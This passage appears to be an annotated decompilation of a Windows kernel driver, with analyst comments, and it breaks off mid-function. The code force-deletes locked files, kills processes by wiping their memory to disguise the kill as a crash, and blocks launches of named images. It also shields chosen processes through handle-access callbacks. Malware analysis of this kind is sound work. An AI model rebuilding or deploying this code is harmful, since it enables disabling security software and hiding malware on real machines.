//      symbolic link to its device name with sub_402330, then append the rest
//      of the path -> String2 is the NT device path of the target file.
//   3. Walk the 16-byte handle entries (PID in the low word of the first
//      dword, handle value in the high word of the second): open the owner
//      with PROCESS_DUP_HANDLE (0x40), duplicate the handle into this process
//      with full access (0x1FFFFF, option 2 = DUPLICATE_SAME_ACCESS), take an
//      object reference and compare its ObQueryNameString name with String2.
//      On a match, re-duplicate with option 3 (DUPLICATE_CLOSE_SOURCE |
//      DUPLICATE_SAME_ACCESS), which closes it in the owning process, and
//      return 1. Only the first match is acted on.
// Notes: the second RtlAppendUnicodeStringToString result lands in v1 but the
// following check re-tests the earlier v31; ProcessHandle is closed only on
// the no-match path; String2's buffer and the 0x808-byte name buffer P are
// not freed on the match path.
char __stdcall sub_401800(int a1)
{
  NTSTATUS v1; // eax
  LSA_UNICODE_STRING Source; // [esp+0h] [ebp-ACh]
  LSA_UNICODE_STRING DestinationString; // [esp+8h] [ebp-A4h]
  LSA_UNICODE_STRING v5; // [esp+10h] [ebp-9Ch]
  char v6; // [esp+18h] [ebp-94h]
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+1Ch] [ebp-90h]
  int v8; // [esp+34h] [ebp-78h]
  int v9; // [esp+38h] [ebp-74h]
  int v10; // [esp+3Ch] [ebp-70h]
  int v11; // [esp+40h] [ebp-6Ch]
  struct _CLIENT_ID ClientId; // [esp+44h] [ebp-68h]
  __int16 v13; // [esp+4Ch] [ebp-60h]
  __int16 v14; // [esp+4Eh] [ebp-5Eh]
  char *v15; // [esp+50h] [ebp-5Ch]
  int v16; // [esp+54h] [ebp-58h]
  PCWSTR v17; // [esp+58h] [ebp-54h]
  LSA_UNICODE_STRING Destination; // [esp+5Ch] [ebp-50h]
  HANDLE SourceHandle; // [esp+64h] [ebp-48h]
  _DWORD *v20; // [esp+68h] [ebp-44h]
  unsigned int v21; // [esp+6Ch] [ebp-40h]
  int v22; // [esp+70h] [ebp-3Ch]
  HANDLE ProcessHandle; // [esp+74h] [ebp-38h]
  LSA_UNICODE_STRING String2; // [esp+78h] [ebp-34h]
  PVOID Object; // [esp+80h] [ebp-2Ch]
  unsigned int i; // [esp+84h] [ebp-28h]
  HANDLE TargetHandle; // [esp+88h] [ebp-24h]
  SIZE_T NumberOfBytes; // [esp+8Ch] [ebp-20h]
  PVOID P; // [esp+90h] [ebp-1Ch]
  PVOID Dst; // [esp+94h] [ebp-18h]
  NTSTATUS v31; // [esp+98h] [ebp-14h]
  char v32; // [esp+9Fh] [ebp-Dh]
  WCHAR SourceString; // [esp+A0h] [ebp-Ch]
  __int16 v34; // [esp+A2h] [ebp-Ah]
  __int16 v35; // [esp+A4h] [ebp-8h]

  Dst = 0;
  v21 = 0;
  P = 0;
  String2.Length = 0;
  *(_DWORD *)&String2.MaximumLength = 0;
  HIWORD(String2.Buffer) = 0;
  // v13..v15 look like an empty counted string (Length 0, MaximumLength 2,
  // Buffer -> two NUL bytes); they are not used further in this listing.
  v13 = 0;
  v14 = 2;
  v15 = byte_402A98;
  v32 = 0;
  // Step 1: size-doubling handle-table query.
  for ( NumberOfBytes = 1; ; NumberOfBytes *= 2 )
  {
    Dst = ExAllocatePoolWithTag(0, NumberOfBytes, 0x46494C45u);
    if ( !Dst )
    {
      if ( P )
      {
        ExFreePoolWithTag(P, 0);
        P = 0;
      }
      if ( String2.Buffer )
        ExFreePoolWithTag(String2.Buffer, 0);
      if ( Dst )
      {
        ExFreePoolWithTag(Dst, 0);
        Dst = 0;
      }
      LOBYTE(v1) = v32;
      return v1;
    }
    memset(Dst, 0, NumberOfBytes);
    v31 = ZwQuerySystemInformation(SystemHandleInformation, Dst, NumberOfBytes, 0);
    if ( v31 >= 0 )
      break;
    if ( v31 != 0xC0000004 )
    {
      if ( P )
      {
        ExFreePoolWithTag(P, 0);
        P = 0;
      }
      if ( String2.Buffer )
        ExFreePoolWithTag(String2.Buffer, 0);
      if ( Dst )
      {
        ExFreePoolWithTag(Dst, 0);
        Dst = 0;
      }
      LOBYTE(v1) = v32;
      return v1;
    }
    ExFreePoolWithTag(Dst, 0);
    Dst = 0;
  }
  // v21 = NumberOfHandles (first dword); entries follow it.
  v20 = Dst;
  v21 = *(_DWORD *)Dst;
  // Step 2: SourceString/v34/v35 form the NUL-terminated 2-char string "X:".
  SourceString = *(_WORD *)(a1 + 8);
  v34 = *(_WORD *)(a1 + 10);
  v22 = 4;
  v35 = 0;
  Destination.Buffer = (PWSTR)ExAllocatePoolWithTag(0, 0x104u, 0x4131u);
  Destination.MaximumLength = 256;
  RtlInitUnicodeString(&DestinationString, &SourceString);
  RtlInitUnicodeString(&v5, &::SourceString);
  RtlCopyUnicodeString(&Destination, &v5);
  v31 = RtlAppendUnicodeStringToString(&Destination, &DestinationString);
  if ( v31 >= 0 )
  {
    sub_402330((int)&Destination, &String2);
    RtlFreeUnicodeString(&Destination);
    v17 = (PCWSTR)(a1 + 12);
    RtlInitUnicodeString(&Source, (PCWSTR)(a1 + 12));
    LOBYTE(v1) = RtlAppendUnicodeStringToString(&String2, &Source);
    if ( v31 >= 0 )
    {
      // Step 3: one iteration per SYSTEM_HANDLE_TABLE_ENTRY_INFO.
      for ( i = 0; i < v21; ++i )
      {
        v8 = v20[4 * i + 1];
        v9 = v20[4 * i + 2];
        v10 = v20[4 * i + 3];
        v11 = v20[4 * i + 4];
        v16 = (unsigned __int16)v8;
        ClientId.UniqueProcess = (HANDLE)(unsigned __int16)v8;
        ClientId.UniqueThread = 0;
        SourceHandle = (HANDLE)HIWORD(v9);
        ObjectAttributes.Length = 24;
        ObjectAttributes.RootDirectory = 0;
        ObjectAttributes.Attributes = 0;
        ObjectAttributes.ObjectName = 0;
        ObjectAttributes.SecurityDescriptor = 0;
        ObjectAttributes.SecurityQualityOfService = 0;
        v1 = ZwOpenProcess(&ProcessHandle, 0x40u, &ObjectAttributes, &ClientId);
        v31 = v1;
        if ( v1 >= 0 )
        {
          v1 = ZwDuplicateObject(ProcessHandle, SourceHandle, (HANDLE)0xFFFFFFFF, &TargetHandle, 0x1FFFFFu, 0, 2u);
          v31 = v1;
          if ( v1 >= 0 )
          {
            v1 = ObReferenceObjectByHandle(TargetHandle, 3u, 0, 0, &Object, 0);
            v31 = v1;
            if ( v1 >= 0 )
            {
              P = ExAllocatePoolWithTag(0, 0x808u, 0x4131u);
              v31 = ObQueryNameString(Object, P, 2056, &v6);
              if ( v31 )
              {
                LOBYTE(v1) = ObfDereferenceObject(Object);
              }
              else
              {
                // Case-insensitive compare of the handle's object name with
                // the target's NT device path.
                if ( !RtlCompareUnicodeString((PCUNICODE_STRING)P, &String2, 1u) )
                {
                  ObfDereferenceObject(Object);
                  ZwClose(TargetHandle);
                  v31 = ZwDuplicateObject(
                          ProcessHandle,
                          SourceHandle,
                          (HANDLE)0xFFFFFFFF,
                          &TargetHandle,
                          0x1FFFFFu,
                          0,
                          3u);
                  if ( v31 >= 0 )
                  {
                    ZwClose(TargetHandle);
                    v32 = 1;
                    LOBYTE(v1) = 1;
                  }
                  else
                  {
                    LOBYTE(v1) = 0;
                  }
                  return v1;
                }
                ExFreePoolWithTag(P, 0);
                P = 0;
                ObfDereferenceObject(Object);
                ZwClose(TargetHandle);
                LOBYTE(v1) = ZwClose(ProcessHandle);
              }
            }
          }
        }
      }
    }
    else
    {
      LOBYTE(v1) = 0;
    }
  }
  else
  {
    LOBYTE(v1) = 0;
  }
  return v1;
}
// 402746: using guessed type int __report_rangecheckfailure(void);
// 402774: using guessed type int __stdcall ObQueryNameString(_DWORD, _DWORD, _DWORD, _DWORD);

//----- (00401CA0) --------------------------------------------------------
// Forced deletion of the file at SourceString, in four stages:
//   1. sub_401E70: open it with DELETE | FILE_READ_ATTRIBUTES (0x10080) and
//      FILE_SHARE_DELETE (4). The status is stored in v7 but never checked,
//      and sub_401E70 returns 0 without setting Handle when IRQL > PASSIVE.
//   2. sub_401800: close other processes' handles to the file.
//   3. sub_4010C0: ZwDeleteFile on the path.
//   4. A hand-built IRP_MJ_SET_INFORMATION (6) / FileDispositionInformation
//      (13) request with DeleteFile = TRUE (v11, placed in
//      AssociatedIrp.SystemBuffer, which the decompiler shows as IrpCount) is
//      sent with IofCallDriver straight to the device IoGetRelatedDeviceObject
//      returns for the file object. Before that the two pointers at file
//      object offset 0x14 -- presumably SectionObjectPointer's
//      DataSectionObject and ImageSectionObject -- are cleared so a mapped or
//      executing image no longer blocks the disposition change; confirm
//      against the FILE_OBJECT layout.
//   Returns 1 when IofCallDriver succeeded (after waiting on Event, which the
//   completion routine sub_402420 signals), else 0.
// sub_402640 / sub_402670 are not in this listing; from their use here they
// look like inlined IoGetNextIrpStackLocation / IoSetCompletionRoutine --
// confirm.
char __stdcall Deletefile(PCWSTR SourceString)
{
  char result; // al
  struct _KEVENT Event; // [esp+0h] [ebp-38h]
  char v3; // [esp+10h] [ebp-28h]
  PDEVICE_OBJECT DeviceObject; // [esp+18h] [ebp-20h]
  _DWORD *v5; // [esp+1Ch] [ebp-1Ch]
  HANDLE Handle; // [esp+20h] [ebp-18h]
  NTSTATUS v7; // [esp+24h] [ebp-14h]
  int v8; // [esp+28h] [ebp-10h]
  PVOID Object; // [esp+2Ch] [ebp-Ch]
  PIRP Irp; // [esp+30h] [ebp-8h]
  char v11; // [esp+37h] [ebp-1h]

  v7 = 0;
  v7 = sub_401E70(SourceString, &Handle, 0x10080u, 4u);
  sub_401800((int)SourceString);
  sub_4010C0(SourceString);
  // 0x10000 = DELETE access on the file object reference, KernelMode (0).
  v7 = ObReferenceObjectByHandle(Handle, 0x10000u, (POBJECT_TYPE)IoFileObjectType, 0, &Object, 0);
  if ( v7 >= 0 )
  {
    DeviceObject = IoGetRelatedDeviceObject((PFILE_OBJECT)Object);
    Irp = IoAllocateIrp(DeviceObject->StackSize, 1u);
    if ( Irp )
    {
      KeInitializeEvent(&Event, SynchronizationEvent, 0);
      v11 = 1;
      Irp->AssociatedIrp.IrpCount = (LONG)&v11;
      Irp->UserEvent = &Event;
      Irp->UserIosb = (PIO_STATUS_BLOCK)&v3;
      Irp->Tail.Overlay.OriginalFileObject = (PFILE_OBJECT)Object;
      Irp->Tail.Overlay.Thread = KeGetCurrentThread();
      Irp->RequestorMode = 0;
      // Stack location (x86 IO_STACK_LOCATION): MajorFunction at +0,
      // Parameters.SetFile.Length at +4, FileInformationClass at +8,
      // Parameters.SetFile.FileObject at +12, DeviceObject at +0x14,
      // FileObject at +0x18.
      v8 = sub_402640((int)Irp);
      *(_BYTE *)v8 = 6;
      *(_DWORD *)(v8 + 20) = DeviceObject;
      *(_DWORD *)(v8 + 24) = Object;
      *(_DWORD *)(v8 + 4) = 1;
      *(_DWORD *)(v8 + 8) = 13;
      *(_DWORD *)(v8 + 12) = Object;
      sub_402670((int)Irp, (int)sub_402420, (int)&Event, 1, 1u, 1);
      v5 = (_DWORD *)*((_DWORD *)Object + 5);
      if ( v5 )
      {
        v5[2] = 0;
        *v5 = 0;
      }
      v7 = IofCallDriver(DeviceObject, Irp);
      if ( v7 >= 0 )
      {
        // Executive wait, KernelMode, Alertable = 1, no timeout.
        KeWaitForSingleObject(&Event, 0, 0, 1u, 0);
        ObfDereferenceObject(Object);
        ZwClose(Handle);
        result = 1;
      }
      else
      {
        ObfDereferenceObject(Object);
        ZwClose(Handle);
        result = 0;
      }
    }
    else
    {
      ObfDereferenceObject(Object);
      ZwClose(Handle);
      result = 0;
    }
  }
  else
  {
    ZwClose(Handle);
    result = 0;
  }
  return result;
}

//----- (00401E70) --------------------------------------------------------
// Opens SourceString with IoCreateFile; *FileHandle receives the handle.
//   DesiredAccess / ShareAccess are passed through (Deletefile uses
//   0x10080 / 4). Returns the IoCreateFile status.
// Fixed arguments: FILE_ATTRIBUTE_NORMAL (0x80), Disposition 1 = FILE_OPEN,
// no create options, Options 0x100 = IO_NO_PARAMETER_CHECKING, object
// attributes 576 = OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE.
// Early exit: at any IRQL above PASSIVE_LEVEL it returns 0 (STATUS_SUCCESS)
// without writing *FileHandle, so the caller then works with an
// uninitialised handle.
NTSTATUS __stdcall sub_401E70(PCWSTR SourceString, PHANDLE FileHandle, ACCESS_MASK DesiredAccess, ULONG ShareAccess)
{
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-2Ch]
  struct _IO_STATUS_BLOCK IoStatusBlock; // [esp+18h] [ebp-14h]
  LSA_UNICODE_STRING DestinationString; // [esp+20h] [ebp-Ch]

  if ( (signed int)KeGetCurrentIrql() > 0 )
    return 0;
  RtlInitUnicodeString(&DestinationString, SourceString);
  ObjectAttributes.Length = 24;
  ObjectAttributes.RootDirectory = 0;
  ObjectAttributes.Attributes = 576;
  ObjectAttributes.ObjectName = &DestinationString;
  ObjectAttributes.SecurityDescriptor = 0;
  ObjectAttributes.SecurityQualityOfService = 0;
  return IoCreateFile(
           FileHandle,
           DesiredAccess,
           &ObjectAttributes,
           &IoStatusBlock,
           0,
           0x80u,
           ShareAccess,
           1u,
           0,
           0,
           0,
           0,
           0,
           0x100u);
}

//----- (00401F00) --------------------------------------------------------
// Boolean view of CheckImageFileName: non-zero when the image name at
// ImageFileName (a UNICODE_STRING-like record: byte length at +0, buffer at
// +4) is already in word_4041B8. The parameter is an int because the
// decompiler saw the pointer passed as a raw value (from the
// PS_CREATE_NOTIFY_INFO field in ProcesssCreateNotifyEx and from
// sub_401000 / sub_401110).
bool __stdcall CheckImageFileNameStub(int ImageFileName)
{
  const wchar_t **name = (const wchar_t **)ImageFileName;
  signed int slot = CheckImageFileName(name);

  if ( slot < 0 )
    return 0;
  return 1;
}

//----- (00401F30) --------------------------------------------------------
// Boolean view of sub_4017C0: non-zero when process id a1 is in the
// protected-PID table dword_404018.
bool __stdcall sub_401F30(int a1)
{
  signed int slot = sub_4017C0(a1);

  if ( slot < 0 )
    return 0;
  return 1;
}

//----- (00401F70) --------------------------------------------------------
// Kills process a1 by wiping its user address space instead of terminating it:
// looks up the EPROCESS (the reference is never released), attaches to its
// address space with KeAttachProcess, memset()s every 4 KiB page from 0x10000
// up to 0x20000000, then detaches. The ms_exc.TryLevel store is what remains
// of a per-page __try/__except that the decompiler dropped -- each page is
// presumably wiped under SEH so that unmapped pages do not bugcheck; confirm
// in the disassembly. The victim dies with an access violation in its own
// code rather than through a termination call, so process-exit telemetry
// shows a crash rather than a kill, and the lookup/attach is not guarded
// when the PID does not exist.
//   Returns whatever KeDetachProcess returns (typed as int by the decompiler).
int __stdcall DestroyProcByZeromemory(int a1)
{
  int v2; // [esp+10h] [ebp-20h]
  void *Dst; // [esp+14h] [ebp-1Ch]
  CPPEH_RECORD ms_exc; // [esp+18h] [ebp-18h]

  PsLookupProcessByProcessId(a1, &v2);
  KeAttachProcess(v2);
  for ( Dst = (void *)0x10000; (unsigned int)Dst < 0x20000000; Dst = (char *)Dst + 4096 )
  {
    memset(Dst, 0, 0x1000u);
    ms_exc.registration.TryLevel = -2;
  }
  return KeDetachProcess();
}
// 40309C: using guessed type int __stdcall KeAttachProcess(_DWORD);
// 4030A0: using guessed type int KeDetachProcess(void);
// 4030A4: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);

//----- (00402030) --------------------------------------------------------
// PsSetCreateProcessNotifyRoutineEx callback. DriverEntry and DrvUnload refer
// to it as ProcesssCreateNotify (declared above); the decompiler prints this
// body under the name ProcesssCreateNotifyEx.
//   a1: process object, a2: process id -- both unused.
//   CreateInfo: PS_CREATE_NOTIFY_INFO on creation, 0 on exit.
// On creation only: if the new image's full path (+0x18 = ImageFileName on
// x86) is in the protected-name table, CreationStatus (+0x20) is set to
// 0xC0000022 (STATUS_ACCESS_DENIED), which makes the kernel fail the launch.
// The process-exit notification (CreateInfo == 0) is ignored.
void __stdcall ProcesssCreateNotifyEx(int a1, int a2, int CreateInfo)
{
  if ( CreateInfo )
  {
    if ( CheckImageFileNameStub(*(_DWORD *)(CreateInfo + 0x18)) )
      *(_DWORD *)(CreateInfo + 32) = 0xC0000022;
  }
}

//----- (00402060) --------------------------------------------------------
// ObRegisterCallbacks pre-operation routine for process handles (registered
// by RegisterProcessCallbacks).
//   a1: RegistrationContext (unused).
//   a2: OB_PRE_OPERATION_INFORMATION -- Operation at +0, Object at +8,
//       Parameters at +0x14; CreateHandleInformation there holds
//       DesiredAccess at +0 and OriginalDesiredAccess at +4.
// When the target process id is in dword_404018 and the operation is
// OB_OPERATION_HANDLE_CREATE (1) -- duplicates (2) are registered in
// RegisterProcessCallbacks but not handled here -- every listed bit that is
// set in OriginalDesiredAccess is cleared from DesiredAccess. The bits match
// PROCESS_* rights (0x1 TERMINATE, 0x8 VM_OPERATION, 0x10 VM_READ, 0x20
// VM_WRITE, 0x800 SUSPEND_RESUME, ...), so a caller cannot obtain a handle
// that could kill, write to or suspend a protected process; 0x2, 0x40 and
// 0x80 are left untouched.
//   Always returns 0 (OB_PREOP_SUCCESS).
int __stdcall ProcessCallBack(int a1, int a2)
{
  int v2; // ST04_4

  v2 = PsGetProcessId(*(_DWORD *)(a2 + 8));
  if ( sub_401F30(v2) && *(_DWORD *)a2 == 1 )
  {
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 1 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFFE;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 4 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFFB;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 8 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFF7;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x10 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFEF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x20 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFDF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x100 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFEFF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x200 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFDFF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x400 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFBFF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x800 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFF7FF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x1000 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFEFFF;
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x2000 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFDFFF;
  }
  return 0;
}
// 402060: using guessed type int __stdcall ProcessCallBack(int, int);
// 403090: using guessed type int __stdcall PsGetProcessId(_DWORD);

//----- (00402230) --------------------------------------------------------
// Registers ProcessCallBack with ObRegisterCallbacks for PsProcessType.
// The locals are laid out as the two registration structures:
//   v1: Version (low word, from ObGetFilterVersion) | OperationRegistrationCount
//       (high word, 1); DestinationString: Altitude "321000";
//       v3: RegistrationContext 0; v4: OperationRegistration -> &v5.
//   v5..v8: ObjectType PsProcessType, Operations 3 (HANDLE_CREATE |
//       HANDLE_DUPLICATE), PreOperation ProcessCallBack, PostOperation 0.
// The registration handle is stored in dword_4041AC for DrvUnload.
//   Returns the ObRegisterCallbacks status, which DriverEntry ignores.
// ObGetFilterVersion is shown with five dummy arguments -- decompiler typing,
// the API takes none. The altitude "321000" is a usable hunting artefact.
int RegisterProcessCallbacks()
{
  int v1; // [esp+0h] [ebp-24h]
  LSA_UNICODE_STRING DestinationString; // [esp+4h] [ebp-20h]
  int v3; // [esp+Ch] [ebp-18h]
  int *v4; // [esp+10h] [ebp-14h]
  int v5; // [esp+14h] [ebp-10h]
  int v6; // [esp+18h] [ebp-Ch]
  int (__stdcall *v7)(int, int); // [esp+1Ch] [ebp-8h]
  int v8; // [esp+20h] [ebp-4h]

  LOWORD(v1) = ObGetFilterVersion(0, 0, 0, 0, 0);
  HIWORD(v1) = 1;
  v3 = 0;
  RtlInitUnicodeString(&DestinationString, L"321000");
  v8 = 0;
  v5 = PsProcessType;
  v6 = 3;
  v7 = ProcessCallBack;
  v4 = &v5;
  return ObRegisterCallbacks(&v1, &dword_4041AC);
}
// 402060: using guessed type int __stdcall ProcessCallBack(int, int);
// 403070: using guessed type int __stdcall ObRegisterCallbacks(_DWORD, _DWORD);
// 403078: using guessed type int __cdecl ObGetFilterVersion(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 4041AC: using guessed type int dword_4041AC;

//----- (004022B0) --------------------------------------------------------
// Thread-object twin of RegisterProcessCallbacks: same OB_CALLBACK_REGISTRATION
// / OB_OPERATION_REGISTRATION layout in v1..v8 (altitude "321000", Operations
// 3 = HANDLE_CREATE | HANDLE_DUPLICATE, no post-operation), but with
// ObjectType PsThreadType and PreOperation ThreadCallback, whose body is not
// in this listing. The registration handle goes to dword_4041B0 for DrvUnload.
//   Returns the ObRegisterCallbacks status, ignored by DriverEntry.
int RegisterThreadCallbacks()
{
  int v1; // [esp+0h] [ebp-24h]
  LSA_UNICODE_STRING DestinationString; // [esp+4h] [ebp-20h]
  int v3; // [esp+Ch] [ebp-18h]
  int *v4; // [esp+10h] [ebp-14h]
  int v5; // [esp+14h] [ebp-10h]
  int v6; // [esp+18h] [ebp-Ch]
  int (__stdcall *v7)(int, int); // [esp+1Ch] [ebp-8h]
  int v8; // [esp+20h] [ebp-4h]

  LOWORD(v1) = ObGetFilterVersion(0, 0, 0, 0, 0);
  HIWORD(v1) = 1;
  v3 = 0;
  RtlInitUnicodeString(&DestinationString, L"321000");
  v8 = 0;
  v5 = PsThreadType;
  v6 = 3;
  v7 = ThreadCallback;
  v4 = &v5;
  return ObRegisterCallbacks(&v1, &dword_4041B0);
}
// 4024F0: using guessed type int __stdcall ThreadCallback(int, int);
// 403070: using guessed type int __stdcall ObRegisterCallbacks(_DWORD, _DWORD);
// 403078: using guessed type int __cdecl ObGetFilterVersion(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 4041B0: using guessed type int dword_4041B0;

//----- (00402330) --------------------------------------------------------
/*
 * Resolves an object-manager symbolic link to its target string.
 *
 * a1         : a PUNICODE_STRING naming the link (the decompiler typed it as
 *              int; the cast into ObjectAttributes restores the intent).
 * LinkTarget : output.  On success its Buffer is a 2048-byte PagedPool
 *              allocation (tag 0x4130) that the CALLER owns and must free.
 *
 * Returns: NTSTATUS — the open or query status, or
 *          STATUS_INSUFFICIENT_RESOURCES (0xC000009A, printed here as
 *          -1073741670) when the pool allocation fails.
 *
 * Review notes: when the query fails the buffer is freed but
 * LinkTarget->Buffer still points at it, so a caller that ignores the status
 * would touch freed pool.  The free passes tag 0 while the allocation used
 * 0x4130; Driver Verifier would likely flag that mismatch.
 */
int __stdcall sub_402330(int a1, PUNICODE_STRING LinkTarget)
{
  int result; // eax
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-20h]
  HANDLE LinkHandle; // [esp+18h] [ebp-8h]
  NTSTATUS v5; // [esp+1Ch] [ebp-4h]

  ObjectAttributes.Length = 24;  // sizeof(OBJECT_ATTRIBUTES) on 32-bit
  ObjectAttributes.RootDirectory = 0;
  ObjectAttributes.Attributes = 64;  // OBJ_CASE_INSENSITIVE (0x40)
  ObjectAttributes.ObjectName = (PUNICODE_STRING)a1;
  ObjectAttributes.SecurityDescriptor = 0;
  ObjectAttributes.SecurityQualityOfService = 0;
  v5 = ZwOpenSymbolicLinkObject(&LinkHandle, 0x80000000, &ObjectAttributes);  // GENERIC_READ
  if ( v5 < 0 )
    return v5;
  LinkTarget->MaximumLength = 2048;  // fixed-size target buffer
  LinkTarget->Length = 0;
  LinkTarget->Buffer = (PWSTR)ExAllocatePoolWithTag(PagedPool, LinkTarget->MaximumLength, 0x4130u);
  if ( LinkTarget->Buffer )
  {
    memset(LinkTarget->Buffer, 0, LinkTarget->MaximumLength);
    v5 = ZwQuerySymbolicLinkObject(LinkHandle, LinkTarget, 0);  // fills LinkTarget in place
    ZwClose(LinkHandle);
    if ( v5 < 0 )
      ExFreePoolWithTag(LinkTarget->Buffer, 0);  // NOTE: Buffer left dangling; tag differs from allocation
    result = v5;
  }
  else
  {
    ZwClose(LinkHandle);
    result = -1073741670;  // STATUS_INSUFFICIENT_RESOURCES
  }
  return result;
}

//----- (00402420) --------------------------------------------------------
/*
 * IRP completion routine (PIO_COMPLETION_ROUTINE shape: DeviceObject, Irp,
 * Context).  It copies the completion status into the caller-supplied
 * Irp->UserIosb, signals Irp->UserEvent so a waiting thread wakes, frees the
 * IRP, and returns STATUS_MORE_PROCESSING_REQUIRED (0xC0000016, printed as
 * -1073741802) so the I/O manager does not touch the now-freed IRP.
 * The IoFreeIrp suggests the IRP was built by the driver itself
 * (IoAllocateIrp) — the allocating side is not visible here.
 * a1 (DeviceObject) and a3 (Context) are unused.
 */
int __stdcall sub_402420(int a1, PIRP Irp, int a3)
{
  Irp->UserIosb->Status = Irp->IoStatus.Status;
  Irp->UserIosb->Information = Irp->IoStatus.Information;
  KeSetEvent(Irp->UserEvent, 0, 0);  // wake the synchronous waiter
  IoFreeIrp(Irp);
  return -1073741802;  // STATUS_MORE_PROCESSING_REQUIRED: IRP is ours, stop completion here
}

//----- (00402470) --------------------------------------------------------
/*
 * Opens the process whose PID is a1 with PROCESS_TERMINATE (access mask 1)
 * and terminates it with exit status 0.
 *
 * Returns: the ZwOpenProcess status when no handle was obtained; otherwise the
 *          ZwClose status.  The ZwTerminateProcess status is discarded, so the
 *          caller cannot tell whether the kill actually succeeded.
 *
 * Review notes: success is judged by ProcessHandle != NULL rather than
 * NT_SUCCESS(result).  Attributes is 0 (no OBJ_KERNEL_HANDLE), so the handle is
 * created in the handle table of whatever process is current at call time.
 */
NTSTATUS __stdcall TerminateProcessById(void *a1)
{
  NTSTATUS result; // eax
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-24h]
  struct _CLIENT_ID ClientId; // [esp+18h] [ebp-Ch]
  HANDLE ProcessHandle; // [esp+20h] [ebp-4h]

  ProcessHandle = 0;
  ClientId.UniqueProcess = a1;  // target PID
  ClientId.UniqueThread = 0;
  ObjectAttributes.Length = 24;  // sizeof(OBJECT_ATTRIBUTES) on 32-bit
  ObjectAttributes.RootDirectory = 0;
  ObjectAttributes.ObjectName = 0;  // open by CLIENT_ID, not by name
  ObjectAttributes.Attributes = 0;
  ObjectAttributes.SecurityDescriptor = 0;
  ObjectAttributes.SecurityQualityOfService = 0;
  result = ZwOpenProcess(&ProcessHandle, 1u, &ObjectAttributes, &ClientId);  // PROCESS_TERMINATE
  if ( ProcessHandle )
  {
    ZwTerminateProcess(ProcessHandle, 0);  // status ignored
    result = ZwClose(ProcessHandle);
  }
  return result;
}

//----- (004024F0) --------------------------------------------------------
/*
 * ObRegisterCallbacks pre-operation callback for THREAD handles
 * (a1 = RegistrationContext, a2 = POB_PRE_OPERATION_INFORMATION).  The
 * offsets match the documented 32-bit layout: a2+0 Operation, a2+8 Object,
 * a2+20 Parameters -> OB_PRE_CREATE_HANDLE_INFORMATION { DesiredAccess (+0),
 * OriginalDesiredAccess (+4) }.
 *
 * Behaviour: when the owning process passes sub_401F30 (a "protected process"
 * test defined elsewhere in this file) and the operation is
 * OB_OPERATION_HANDLE_CREATE (1), each of the following rights is removed from
 * the granted DesiredAccess if it was originally requested (values per the
 * standard thread access-rights encoding):
 *   0x001 THREAD_TERMINATE, 0x002 THREAD_SUSPEND_RESUME,
 *   0x080 THREAD_SET_THREAD_TOKEN, 0x400 THREAD_SET_LIMITED_INFORMATION,
 *   0x020 THREAD_SET_INFORMATION, 0x010 THREAD_SET_CONTEXT.
 * Net effect: new handles to the protected process's threads cannot be used to
 * terminate, suspend or alter them.  Handle DUPLICATE (operation 2) is
 * registered but not filtered here.
 *
 * The routine the decompiler labels PsGetProcessId receives the callback's
 * Object pointer, which for a thread registration is a thread object; the
 * import name is a decompiler guess (see the note after this function), so the
 * real callee may be PsGetThreadProcessId — TODO confirm against the IAT.
 *
 * Returns: 0 (OB_PREOP_SUCCESS) unconditionally.
 */
int __stdcall ThreadCallback(int a1, int a2)
{
  int v2; // ST04_4  PID owning the thread being opened

  v2 = PsGetProcessId(*(_DWORD *)(a2 + 8));  // a2+8 = Object
  if ( sub_401F30(v2) && *(_DWORD *)a2 == 1 )  // protected PID && OB_OPERATION_HANDLE_CREATE
  {
    // Each test reads OriginalDesiredAccess (+4); each clear writes DesiredAccess (+0).
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 1 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFFE;  // drop THREAD_TERMINATE
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 2 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFFD;  // drop THREAD_SUSPEND_RESUME
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x80 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFF7F;  // drop THREAD_SET_THREAD_TOKEN
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x400 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFBFF;  // drop THREAD_SET_LIMITED_INFORMATION
    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x20 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFDF;  // drop THREAD_SET_INFORMATION
